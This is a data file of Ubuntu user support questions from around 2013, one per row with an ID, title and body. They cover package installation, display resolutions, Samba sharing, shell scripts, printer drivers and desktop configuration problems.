330221	sudo pecl command not found	i 'm using ubuntu 12.04 i installed php pear using this command sudo apt-get install php-pear php5-dev i got this results reading package lists ... done building dependency tree reading state information ... done php-pear is already the newest version . php5-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . now when i use this command sudo pecl install v8js-0.1.3 i 'm getting this error sudo : pecl : command not found can someone tell me how to fix this error ? thankyou
330224	krusader : how to hide fn key bar permanently	does anyone know how to hide fn key bar in krusader so the settings are saved when it is restarted ? if you go to settings- > show fn key bars and uncheck it , then fn bar disappears but only for the current session , meaning that if you quit krusader and then it 's shown again upon the start ( this setting is not saved ) . maybe i could add some property to config file manually ? something like hide fn keys=yes but is there a key like this ? any ideas ?
330227	how can i remove the lubuntu packages after installing ubuntu-desktop on top of lubuntu ?	on this machine , i installed lubuntu 12.04 and then installed the ubuntu-desktop package . now there is some lubuntu software , such as the lubuntu software center , xscreensaver , and abiword , that needs to be removed . there are plenty of scripts online , like this one , that describe how to get back to a pure ubuntu desktop ( after installing the lubuntu-desktop package ) by removing all the lubuntu packages , that is , the packages that lubuntu-desktop depends on . can i use that script to remove the old lubuntu packages and fully migrate to pure ubuntu ? i am worried that the script may remove some packages , like libbluray , that ubuntu needs .
330228	iphone 4 and ubuntu 13.04	hello i have a big problem , when i am trying to sync my music with iphone 4 using rhythmbox it just exits . when i am trying to sync my music using banshee its just freezes . anyone have ideas ?
330231	cant install ziproxy	i am trying to install ziproxy ( http : //packages.ubuntu.com/lucid/ziproxy ) ( http : //ziproxy.sourceforge.net/download.html ) using apt-get install zizproxy but im getting this error below . reading package lists ... done building dependency tree reading state information ... done package ziproxy is not available , but is reffered to by another package . this may mean that the package is missing , has ben obsoleted , or is only available from another source . why is this happening and how can i get around this or install it ? it says i should be able to install using `apt-get install zizproxy i tried sudo apt-get install zizproxy and it still didnt work .
330234	three fingers swipe and page back and forth in browser on ubuntu 13.04	is there anything that enables you to back and forth web pages in a browser with three fingers swipe on ubuntu 13.04 , as seamlessly as on os x , if not better ? google searching told me that touchegg would be a good fit for my purpose , but i later found that it supports only prior versions , not 13.04 currently . so are there any alternatives ? or if there does n't exist , then how you guys ( at least those using 13.04 ) do page back and forth in your browser ? i believe that it 's too painful either to put your cursor on arrows located at top left and click on those or put alt + < > on your keyboard in order to do page back and forth . i use ubuntu on macbook pro trackpad and keyboard , for your information . thanks .
330239	compiz is taking more than 100 % cpu	my system was prompting for update and i updated softwares now system is very slow . i checked and found that compiz was taking more than 100 % cpu .i think this is making system slow
330248	what file formats does lp support ?	what types of files , such as images ( jpg , png , tiff ) and documents ( pdf , doc , docx , xls ) can lp render correctly and print ? i 'm trying to make a print kiosk and do n't quite know how accommodating i can be with lp to print from the command line with a script .
330252	istallation of 13.04 will not complete using wubi.exe	downloaded ubuntu 13.04 on my windows 8 hp desktop . installed ubuntu using wubi.exe . when i choose ubuntu as the operating system , i get a black screen that says its completing the installation . then i get an `` initramfs '' message that says `` windows is hibernated ... '' . also , i should run `` chkdsk /r '' from windows and then try again . huh ? ? ?
330256	window behavior problems after removing unity	i just reinstalled ubuntu 12.10 and ran sudo apt-get install gnome-core then sudo apt-get remove unity unity-2d unity-2d-panel unity-2d-shell i have done this before and never had any problems but after chosing gnome classic and logging back in i noticed that i am unable to move windows such as nautalis or text editor . these programs dock in the upper-left hand corner as usual but there is no way to drag and drop them or close them other than clicking close on the panel at the bottom . i tried this with gnome classic no effects and i can control the windows but they still do not look right . i can tell that i am missing some things . should i install something like gnome-desktop or other components ? i just reformatted after really messing up gnome due and no longer being able to run gnome-terminal so i do n't want to break anything else . thanks .
330257	ubuntu does n't find installed drivers for brother mfc-255cw printer	i am brand new to ubuntu , but i a fairly experienced computer user . following the instructions provided by the brother website , i was able to install the drivers ( cupswrapper and lpr ) for the mfc-255cw printer locally connected to the computer . when looking for the drivers via the terminal , the drivers are found . however , when i attempt to add the printer , ubuntu searches for but does not find the drivers . what am i doing wrong ? has anyone experienced this same problem ? are there instructions , other than those on the brother website , for installing the specified printer ? any assistance is appreciated .
330262	how do i make a shell script in ubuntu terminal ?	now i do n't know if that is exactly what it is called , so please forgive my bad terminology and correct me if i 'm wrong , but i 'm looking for a way to shorten this bit of code : gcc -o hello hello.m \ -i `gnustep-config -- variable=gnustep_system_headers` \ -l `gnustep-config -- variable=gnustep_system_libraries` \ -lgnustep-base -fconstant-string-class=nsconstantstring \ -d_native_objc_exceptions now to clarify , this code allows me to execute or build/run an objective-c program that i build . it took me awhile to actually find it as i was having errors with compiling objective-c in ubuntu previously , but this code works . now i do n't mind typing it in every time if i absolutely have too , but i feel like there is an easier way . so is there anyway i can shove this into a text file and save it as gcc execute or something and make it where i only have to type one line like : ./gcc execute to run it and then just ./-name of obj-c file and it would run my program ? now i 'm not looking for that form of method exactly , it 's just an example , is there anyway to do anything like that ? it would make things much more convenient , any help is always appreciated !
330264	internet connection works during preview but not after install	i 've been messing with this all day , i 'm fairly new to ubuntu and everything . my wired connection shows up during the preview when i install from my pendrive , but whenever the installation is over and i go to the desktop no type of internet connection is shown .
330268	how to install codelite on ubuntu ?	i would like to install codelite on my ubuntu system , but when i try to install it using the software center , it gives me an error : codelite : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.8.1-2ubuntu1~12.04 is to be installed depends : libjpeg8 ( > = 8c ) but 8c-2ubuntu7 is to be installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed if i try to install these packages trough the console it basically tells me they are already installed : command : sudo apt-get install libgcc1 reading package lists ... done building dependency tree reading state information ... done libgcc1 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
330271	create a list of files located in multiple directories	i have a set of data files ( *.all ) located in different folders documents/rawdata/geob1005/1.all , 2.all , 3.all , ... , n.all documents/rawdata/geob1006/a.all , b.all , c.all , ... , z.all and so on ... i have created a file called datalist.mb-1 in each directory which lists all the *.all files located in the same directory using : /bin/ls -1 *.all | awk ' { print $ 1 '' 58 '' } ' > datalist.mb-1 so i get this : documents/rawdata/geob1005/datalist.mb-1 documents/rawdata/geob1006/datalist.mb-1 and so on ... now i need to create a `` master '' datalist in documents/rawdata/ that points out to all the other datalists inside the directories of rawdata/ i need the outcome of the `` master '' datalist to look like this : geob1005/datalist.mb-1 -足1 geob1006/datalist.mb-1 -1 any idea of how to do this task ? thanks in advance .
330272	help with system tray whitelisting ?	i 'm running 13.04 stock . i use cryptkeeper and davmail for access to things . how to get the systray whitelist back in ubuntu 13.04 is the method i used to get it working . everything was going swimmingly , then i decided to upgrade bumblebee and primus to try and get better performance in games . since i was running the old version of primus , i followed the directions , did a purge of that ppa , removed bumblebee and then apt-get update , apt-get upgrade ... you know , normal stuff . when i rebooted , logon was off . i had no launcher or dash or anything after login . ugh , ok . i screwed something up with unity . so , i reset unity . dconf reset -f /org/compiz/ unity -- reset-icons & disown so that got my launcher and dash back up , although at default settings . now , i ca n't seem to get the system tray whitelist to work . i can see the key existing in dconf-editor . if i try and manually force the change via console , i get this : : ~ $ gsettings set com.canonical.unity.panel systray-whitelist `` [ 'all ' ] '' no such schema 'com.canonical.unity.panel' when i check , the ppa is still in my sources , as well as the packages seem to be installed . ( http : //ppa.launchpad.net/timekiller/unity-systrayfix/ubuntu/pool/main/u/unity/ ) is the url to the path . below is my installed package versions : ~ $ dpkg -- list | grep -i unity ii gir1.2-unity-5.0 : i386 6.90.2daily13.04.05-0ubuntu1 i386 gobject introspection data for the unity library ii gnome-control-center-unity 1.2daily13.04.09-0ubuntu1 i386 change the settings of the unity desktop ii hud 13.04.0daily13.04.03-0ubuntu1 i386 backend for the unity hud ii libmeanwhile1 1.0.2-4ubuntu2 i386 open implementation of the lotus sametime community client protocol ii libufe-xidgetter0 2.4.7bzr13.04.15-0ubuntu1 i386 firefox extension : unity integration ii libunity-common 6.90.2daily13.04.05-0ubuntu1 all binding to get places into the launcher - common files ii libunity-core-6.0-5 7.0.0daily13.06.19~13.04-0ubuntu1 i386 core library for the unity interface . ii libunity-misc4 4.0.5daily13.02.26-0ubuntu1 i386 miscellaneous functions for unity - shared library ii libunity-protocol-private0 : i386 6.90.2daily13.04.05-0ubuntu1 i386 binding to get places into the launcher - private library ii libunity-webapps0 2.5.0~daily13.03.18-0ubuntu1 i386 web apps integration with the unity desktop ii libunity9 : i386 6.90.2daily13.04.05-0ubuntu1 i386 binding to get places into the launcher - shared library ii thunderbird-globalmenu 17.0.8+build1-0ubuntu0.13.04.1 i386 unity appmenu integration for thunderbird ii unity 7.0.0daily13.06.19~13.04-0ubuntu1 i386 interface designed for efficiency of space and interaction . ii unity-asset-pool 0.8.24daily13.04.24-0ubuntu1 all unity assets pool ii unity-common 7.0.0daily13.06.19~13.04-0ubuntu1 all common files for the unity interface . ii unity-greeter 13.04.2-0ubuntu1 i386 unity greeter ii unity-lens-applications 6.10.0daily13.06.19~13.04-0ubuntu1 i386 application lens for unity ii unity-lens-files 7.0~daily13.04.15-0ubuntu1 i386 file lens for unity ii unity-lens-friends 0.1.1bzr13.04.12-0ubuntu1 i386 friends lens for unity ii unity-lens-music 6.8.1daily13.04.18~13.04-0ubuntu1 i386 music lens for unity ii unity-lens-photos 0.9daily12.12.05-0ubuntu1 all unity photos lens ii unity-lens-shopping 6.8.0daily13.03.04-0ubuntu1 i386 shopping lens for unity ii unity-lens-video 0.3.14daily13.06.19~13.04-0ubuntu1 i386 unity video lens ii unity-scope-gdrive 0.8daily13.04.15-0ubuntu1 all google drive scope for unity ii unity-scope-musicstores 6.8.1daily13.04.18~13.04-0ubuntu1 i386 store music lens for unity ii unity-scope-video-remote 0.3.14daily13.06.19~13.04-0ubuntu1 i386 remote videos engine ii unity-services 7.0.0daily13.06.19~13.04-0ubuntu1 i386 services for the unity interface rc unity-webapps-common 2.4.14-0ubuntu1 all unity webapp integration scripts ii unity-webapps-service 2.5.0~daily13.03.18-0ubuntu1 i386 service for web apps integration with the unity desktop ii xul-ext-unity 2.4.7bzr13.04.15-0ubuntu1 all firefox extension : unity integration i 'm at a loss as to ( 1 ) why it does n't work , and ( 2 ) who i even ask for help . so , uh , can anyone point me in the right direction ?
330273	ubuntu 13.04 connecting another monitor	i 'm trying to connect another monitor via vga to work with dell latitude e5500 laptop on ubuntu 13.04 64 bit , i have xorg-edgers ppa for intel g45 chipset driver . when connecting i can span the display on both monitor the laptop and the philips . the problem is when i touch the keyboard of the laptop the display changes resolution and exit from spanning mode . why ? my graphics card is intel 4500hd ( intel corporation mobile 4 series chipset integrated graphics controller )
330274	shell script compsrison does not work as intended	the follwing code is for to compare two strings or variables . but , i can not do it . i did a lot of googling , but no use . here , output does n't depend upon the changing of inputs . can any one correct this code ? ? # ! /bin/sh echo `` enter your username1 : '' read username1 echo `` enter your username2 : '' read useraname2 if [ `` $ username1 '' == '' $ username2 '' ] then echo 'same ' else echo 'different ' fi
330282	how to install compat-drivers ?	i followed many many tutorials but it does n't work . i want to install the compat-drivers which include the negative-one-patch . in airodump-ng i always get the error : mon0 is on channel -1 , but the ap uses channel ... i tried many os , like ubuntu 13.04 , 12.04/10 and neptune 3.1 from zevenos . i also tried backtrack but it does n't boot . the only thing i want is to install succesfully the compat-drivers . if so , could anyone help me , it would be very nice ! thank you very much !
330285	migration to remote installation	i am having difficulty finding a good tutorial on what i am looking to accomplish . i have in the past few weeks setup a home server ( ubuntu 13.04 ) with various packages that i now want to have hosted on a vps . the time it took to get everything functional was quite substantial ( i am extremely new to ubuntu/linux ) . however the install is a guest os install on oracle 's virtualbox . most vps 's are not willing to assist me in this issue and instead it seems i will be forced to install one of their default ubuntu installs ( usually 12.04 ) so ... let 's assume i am forced to install a fresh copy of ubuntu 12.04 on a vps ... how do i go about migrating my data / programs / configs ... . everything from my home installation to the new vps host ... is this possible ?
330291	how to uninstall windows 8 and put ubuntu in c drive ?	i have installed ubuntu 13.4 via pendrive using dual booting.. now i want to cut off my windows 8 and i want to use only ubuntu ... what is the best way to uninstall windows 8 and put ubuntu in c : \ drive ?
330293	how do i set a monitor resolution that is not available in the display settings dialog ?	i just installed ubuntu 13.04 x64 my resolution is 800x600 and there is no other option . i tried to install the nvidia driver 313 but still nothing . i tried doing this http : //www.howopensource.com/2012/10/install-nvidia-geforce-driver-in-ubuntu-12-10-12-04-using-ppa/ still no luck , thank you
330295	can not bootstrap due to clout-init `` errors running cloud_config [ final ] : [ scripts-user ] ''	i have installed maas server and configured juju also , and bootstrapped juju for 1st time , which i know will install zookeeper on 1 `` ready '' state vm available in maas . so i observed this installation , it installed os and the rebooted and came to this screen and since then its stuck , error command failed : can not inject a machine without a instance id errors running cloud_config [ final ] : [ scripts-user ] what are these errors ? how can i resolve them ? i am running 12.04.2 lts , juju version is 1.13.1-precise-amd64 and maas version - 1.3.1 i also checked juju status -v , its gives following message continuously : 2013-08-08 16:31:17 info juju open.go:107 state : connection established 2013-08-08 16:31:17 info juju conn.go:64 juju : authorization error while connecting to state server ; retrying 2013-08-08 16:31:17 info juju open.go:69 state : opening state ; mongo addresses : [ `` pxp7m.master:37017 '' ] ; entity `` '' 2013-08-08 16:31:17 info juju open.go:107 state : connection established 2013-08-08 16:31:18 info juju open.go:69 state : opening state ; mongo addresses : [ `` pxp7m.master:37017 '' ] ; entity `` '' 2013-08-08 16:31:18 info juju open.go:107 state : connection established 2013-08-08 16:31:18 info juju open.go:69 state : opening state ; mongo addresses : [ `` pxp7m.master:37017 '' ] ; entity `` ''
330296	how to hack wifi keys in ubuntu 12.04	i 'm using 12.04 . now , i would like to crack wifi keys . is it possible ? then please show me the process or software .
330298	some files and folders are missing in unity desktop	these are regular files / folders . i can not predict what folders or files will become missing on the unity desktop . however , files and folders do show inside the home folder - > desktop . this appears to be a very bad bug as though unity does n't want people to put icons on the desktop ! i 'm talking about regular files , not hidden files or anything . in fact , if i want to make all hidden files folders to appear from the home folders , how do i do that ? here , another person has the same issue and answer remains unanswered . files and folders do not appear on the unity desktop the more i use unity , the more frustrated i get . whose dumb decision to remove the command prompt shortcut by default ? ? now i have to use control alt t. debian does n't have any of these problems . why is ubuntu released in such buggy condition ? ? ubuntu 12.04 lts .
330303	can`t create anew solution with mono ?	i installed mono develop with his all packages . when i tried to create anew solution , an error message appeared to me . what should i do ? this is the text which bothered me : error while trying to load the project '/home/theghost/desktop/3333/3333/3333.vbproj ' : project does not support framework '.netframework , version=v4.0'
330304	how to start vnc server on-demand ( not on boot )	i have a vps which has the basic xfce environment & tightvncserver installed . i would like to have tightvncserver automatically start whenever i initiate a connection to the port it runs on ( in my case , 5901 ) . i 've seen posts about using inetd or xinetd to do this , but i 've also seen lots of posts saying that ( x ) inetd is not included in ubuntu for a reason , and that it 's a bad idea to use it . anyways , i 'm looking for a way to auto-start tightvncserver whenever there 's an incoming connection to port 5901 , preferably with as few dependencies as possible
330305	haswell integrated graphics with vga ( d-sub ) port max resolution problem	i recently bought new laptop with two graphics cards : intel 4600 and geforce 765m . having seen this topic ( how well do laptops with nvidia optimus work ? ) i abandoned any hope of getting the nvidia chip getting hold of my external display . however , i 'm facing another problem , far bigger for me : the haswell chip does not recognize all resolutions my display has to offer ( it 's a eizo s2402w connected via the vga port ) . it stops at 1600x1200 and i need a native resolution of 1920x1200 . things i tried so far : installed a new kernel - 3.10 from kernel.ubuntu.com - no change tried to insert new mode with xrandr - to no avail my system is : i7-4700mq/8gb/gtx765m/intel4600 ubuntu 13.04 x86_64 with both stock kernel and 3.10 for saucy i also installed the nvidia-319 driver for testing of bumblebee how could i set the native resolution of 1920x1200 when the xrandr does not allow that ? update : in /var/log/xorg.0.log the correct modeline is present , but it is not available in xrandr : [ 617.921 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1920x1200 '' x0.0 193.25 1920 2056 2256 2592 1200 1203 1209 1245 -hsync +vsync ( 74.6 khz ep ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x0.0 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x0.0 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x0.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync ( 37.5 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x0.0 31.50 640 664 704 832 480 489 492 520 -hsync -vsync ( 37.9 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x0.0 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 720x400 '' x0.0 28.32 720 738 846 900 400 412 414 449 -hsync +vsync ( 31.5 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1280x1024 '' x0.0 135.00 1280 1296 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 80.0 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x0.0 78.75 1024 1040 1136 1312 768 769 772 800 +hsync +vsync ( 60.0 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x0.0 75.00 1024 1048 1184 1328 768 771 777 806 -hsync -vsync ( 56.5 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x0.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x0.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync ( 46.9 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x0.0 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync ( 48.1 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1600x1200 '' x0.0 162.00 1600 1664 1856 2160 1200 1201 1204 1250 +hsync +vsync ( 75.0 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1600x1200 '' x0.0 202.50 1600 1664 1856 2160 1200 1201 1204 1250 +hsync +vsync ( 93.8 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1680x1050 '' x0.0 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync ( 65.3 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1280x1024 '' x0.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1280x960 '' x0.0 108.00 1280 1376 1488 1800 960 961 964 1000 +hsync +vsync ( 60.0 khz e ) [ 617.921 ] ( ii ) intel ( 0 ) : modeline `` 1152x864 '' x0.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync ( 67.5 khz e ) [ 618.984 ] ( ii ) intel ( 0 ) : resizing framebuffer to 3600x1080 [ 618.986 ] ( ii ) intel ( 0 ) : switch to mode 1920x1080 @ 59.9 on pipe 0 using edp1 , position ( 0 , 0 ) , rotation normal [ 619.012 ] ( ii ) intel ( 0 ) : switch to mode 1680x1050 @ 60.0 on pipe 1 using vga1 , position ( 1920 , 0 ) , rotation normal update 2 : i checked my monitor with computer from work which runs core i5-2410m with intel hd graphics 3000 on board , everything works fine . version of ubuntu is 12.04 x86_64 with stock kernel 3.2.0-51 . so taking into consideration that the intel chip ( both of the actually ) is aware of the resolutions my display reports ( edid ) : update 3 : i updated the xorg griver : xserver-xorg-video-intel to version 2:2.21.14+git20130806.6004870d-0ubuntu0sarvatt~raring with no success . update 4 : just bought dvi2hdmi cable and bam , full hd resolution now works fine .
330306	make ubuntu 13.04 visible windows 8 network	i have searched all over for this and have not found an answer that works yet . i am setting up a printer/file server that is running 13.04 . i would like to use samba to do this . i have gotten the printers and the shares set up , but i can not seem to access the ubuntu machine by going to my network folder on the windows machine . i can , however , access it by typing \\static_ip_address so , i know samba is working . i just can not access it via its netbios name . also i do not want to set any username or password . i just want to access the shares just like i would from any other windows machine . any ideas ? here is my smb.conf file : # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # a well-established practice is to name the original file # `` smb.conf.master '' and create the `` real '' config file with # testparm -s smb.conf.master > smb.conf # this minimizes the size of the really used smb.conf file # which , according to the samba team , impacts performance # however , use this with caution if your smb.conf file contains nested # `` include '' statements . see debian bug # 483187 for a case # where using a master file is not a good idea . # # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = workgroup # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = lmhosts host wins bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . # security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . encrypt passwords = yes # if you are using encrypted passwords , samba will need to know what # password database type you are using . passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # the following parameter makes sure that only `` username '' can connect # # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ storage ] path = /home/storage force user = media force group = media read only = no force create mode = 0777 force directory mode = 0777 guest ok = yes [ drivers ] path = /home/media/drivers force user = media force group = media read only = no force create mode = 0777 force directory mode = 0777 guest ok = yes [ saved scans ] path = /var/www/scanner/scans force user = media force group = media read only = no force create mode = 0777 force directory mode = 0777 guest ok = yes [ www ] path = /var/www force user = media force group = media read only = no force create mode = 0777 force directory mode = 0777 guest ok = yes
330307	ca n't login without mounting encrypted $ home from tty	when i try logging in , using the correct password , the screen goes black , it flashes the nvidia logo and then takes me back to the login screen . after trying to restart lightdm , researching .xauthority and .iceauthority , the only solution that worked was to alt + f1 into tty1 , login and run ecryptfs-mount-private after it gave me some comments on user session keyrings . i never had to do this before and it broke on the reboot after the latest ubunutu base upgrade . please advise
330315	ubuntu wont install packages from cd	i 'm running a fresh install of 13.04 , and i 'm trying to install ndiswrapper to make my old pci wireless card work and i 've found the correct drivers ( according to the ndiswrapper wiki ) but when i install them with ndisgtk i get fatal error ndiswrapper not found . i tried installing from here , but when i use the deb file it asks me to insert the install cd , which i do , but it never seems to pick it up . it says insert disk into /media/cdrom to continue , but the path in my file explorer says the cd is located at /media/josh/ubuntu 13.04 i386 . how can i fix this ? i really need ndiswrapper .
